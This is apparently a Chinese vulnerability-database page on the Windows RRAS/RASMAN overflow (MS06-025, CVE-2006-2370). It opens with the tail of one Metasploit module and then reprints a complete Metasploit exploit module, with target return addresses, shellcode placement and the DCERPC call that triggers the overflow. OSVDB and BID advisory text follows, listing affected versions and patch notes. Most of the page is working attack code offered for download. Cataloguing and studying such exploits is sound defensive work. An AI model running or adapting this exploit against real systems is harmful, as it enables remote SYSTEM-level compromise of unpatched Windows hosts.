            NDR.long(rand(0xffffffff)) + # PreviewPhoneNumber
            NDR.long(rand(0xffffffff)) + # UseLocation
            NDR.long(rand(0xffffffff)) + # ShowLights
            NDR.long(rand(0xffffffff)) + # ShowConnectStatus
            NDR.long(rand(0xffffffff)) + # CloseOnDial
            NDR.long(rand(0xffffffff)) + # AllowLogonPhonebookEdits
            NDR.long(rand(0xffffffff)) + # AllowLogonLocationEdits
            NDR.long(rand(0xffffffff)) + # SkipConnectComplete
            NDR.long(rand(0xffffffff)) + # NewEntryWizard
            NDR.long(rand(0xffffffff)) + # RedialAttempts
            NDR.long(rand(0xffffffff)) + # RedialSeconds
            NDR.long(rand(0xffffffff)) + # IdleHangUpSeconds
            NDR.long(rand(0xffffffff)) + # RedialOnLinkFailure
            NDR.long(rand(0xffffffff)) + # PopupOnTopWhenRedialing
            NDR.long(rand(0xffffffff)) + # ExpandAutoDialQuery
            NDR.long(rand(0xffffffff)) + # CallbackMode

            NDR.long(0x45) + type2 +     # Parsed by CallbackListFromRpc
            NDR.wstring("\x00" * 129)  +
            NDR.long(rand(0xffffffff)) +
            NDR.wstring("\x00" * 520)  +
            NDR.wstring("\x00" * 520)  +

            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +
            NDR.long(rand(0xffffffff)) +

            NDR.string("\x00" * 514) +
            
			NDR.long(rand(0xffffffff)) + 
            NDR.long(rand(0xffffffff))  
        
		stubdata = 
			type1 + 
			NDR.long(rand(0xffffffff)) + 
			eggdata
			
        print_status('Stub is ' + stubdata.length.to_s + ' bytes long.')

		begin
			print_status('Creating the malicious registry key...')
			response = dcerpc.call(0xA, stubdata)
			
			print_status('Triggering the base pointer overwrite...')
			response = dcerpc.call(0xA, stubdata)
			
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		end

		handler
		disconnect
	end

end
    

- 漏洞信息 (F83082)

Microsoft RRAS Service Overflow (PacketStormID:F83082)
2009-11-26 00:00:00
H D Moore,Nicolas Pouvesle  metasploit.com
exploit,remote,overflow
windows,2k
CVE-2006-2370
[点击下载]

This Metasploit module exploits a stack overflow in the Windows Routing and Remote Access Service. Since the service is hosted inside svchost.exe, a failed exploit attempt can cause other system services to fail as well. A valid username and password is required to exploit this flaw on Windows 2000.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::DCERPC
	include Msf::Exploit::Remote::SMB


	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft RRAS Service Overflow',
			'Description'    => %q{
        		This module exploits a stack overflow in the Windows Routing and Remote
				Access Service. Since the service is hosted inside svchost.exe, a failed 
				exploit attempt can cause other system services to fail as well. A valid
				username and password is required to exploit this flaw on Windows 2000. 
				When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.			},
			'Author'         => 
				[
					'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
					'hdm'
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2006-2370' ],
					[ 'OSVDB', '26437' ],
					[ 'BID', '18325' ],
					[ 'MSB', 'MS06-025' ] 
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1104,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'Windows 2000 SP4', { 'Ret' => 0x7571c1e4 } ],
					[ 'Windows XP SP1',   { 'Ret' => 0x7248d4cc } ],
				],

			'DisclosureDate' => 'Jun 13 2006'))
			
		register_options(
			[
				OptString.new('SMBPIPE', [ true,  "The pipe name to use (ROUTER, SRVSVC)", 'ROUTER']),
			], self.class)
						
	end

	# Post authentication bugs are rarely useful during automation
	def autofilter
		false
	end
	
	def exploit	
		
		connect()
		smb_login()

		handle = dcerpc_handle('20610036-fa22-11cf-9823-00a0c911e5df', '1.0', 'ncacn_np', ["\\#{datastore['SMBPIPE']}"])
		
		print_status("Binding to #{handle} ...")
		dcerpc_bind(handle)
		print_status("Bound to #{handle} ...")


		print_status('Getting OS...')
		
		# Check the remote OS name and version
		os = smb_peer_os
		pat = ''
		
		case os
		when /Windows 5\.0/
			pat = 
				payload.encoded +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				"\xe9\xb7\xfb\xff\xff"
			os = 'Windows 2000'
		when /Windows 5\.1/
			pat =
				rand_text_alphanumeric(0x4c) +
				"\xeb\x06" +
				rand_text_alphanumeric(2) +
				[target.ret].pack('V') +
				payload.encoded
			os = 'Windows XP'				
		end
			
		req = [1, 0x49].pack('VV') + pat + rand_text_alphanumeric(0x4000-pat.length)
		len = req.length
		stb = 
			NDR.long(0x20000) +
			NDR.long(len) +
			req           + 
			NDR.long(len)

		print_status("Calling the vulnerable function on #{os}...")
		
		begin
			dcerpc.call(0x0C, stb)
		rescue Rex::Proto::DCERPC::Exceptions::NoResponse
		rescue => e
			if e.to_s !~ /STATUS_PIPE_DISCONNECTED/
				raise e
			end
		end

		# Cleanup
		handler
		disconnect
	end

end
    

- 漏洞信息

26437
Microsoft Windows RRAS RASMAN Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

An unspecified remote overflow exists in Windows. The RASMAN component of RRAS fails to validate unspecified network traffic resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-06-13 Unknow
2006-06-27 2006-07-27

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Microsoft Windows Routing and Remote Access Remote Code Execution Vulnerability
Boundary Condition Error 18325
Yes No
2006-06-13 12:00:00 2006-06-29 06:09:00
The vendor disclosed this vulnerability.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional x64 Edition
Microsoft Windows XP Professional SP2
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP2
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP Gold 0
Microsoft Windows XP 0
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium SP1
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition SP1
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server

- 漏洞讨论

Microsoft Windows Routing and Remote Access is prone to a memory-corruption vulnerability. This issue is due to the software's failure to properly bounds-check user-supplied network data before copying it to an insufficiently sized memory buffer.

This issue allows remote attackers to execute arbitrary machine code on affected computers with SYSTEM-level privileges. This facilitates the complete compromise of affected computers.

Exploiting this issue on Microsoft Windows XP SP2 or Windows Server 2003 requires valid login credentials. Anonymous attacks are possible with Windows 2000 and Windows XP versions prior to SP2.

- 漏洞利用

A proof-of-concept exploit is available to members of the Immunity Partner's Program. No publicly available exploit is known to exist at this time.

The exploit is available from the following location:

https://www.immunityinc.com/downloads/immpartners/ms06_025b.tar

It is currently unknown if this exploit targets the vulnerability reported in this BID or the one described in BID 18358, since they were both addressed in Microsoft Security Advisory MS06-025.

Two Metasploit framework exploit modules are available:

rras_ms06_025.pm
rras_ms06_025_rasman.pm

- 解决方案

Microsoft has released an advisory along with fixes to address this issue. Please see the referenced advisory for more information.

Microsoft has updated security bulletin MS06-025 to re-release fixes to address issues affecting customers using a terminal window or dial-up scripting with dial-up connections. The vendor has also resolved issues involving scripts to change device configuration parameters using the following commands:

- set port parity
- set port databits
- set port stopbits

These issues arose for users after installing the original fixes released as part of MS06-025. More information is available in Microsoft's Knowledge Base Article 911280. Please see the references for details.


Microsoft Windows Server 2003 Datacenter Edition SP1

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows XP Media Center Edition SP2

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows Server 2003 Enterprise Edition Itanium SP1

Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows XP Home SP2

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Tablet PC Edition SP2

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home SP1

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003 Web Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition SP1

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows XP Professional SP2

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows XP Professional SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站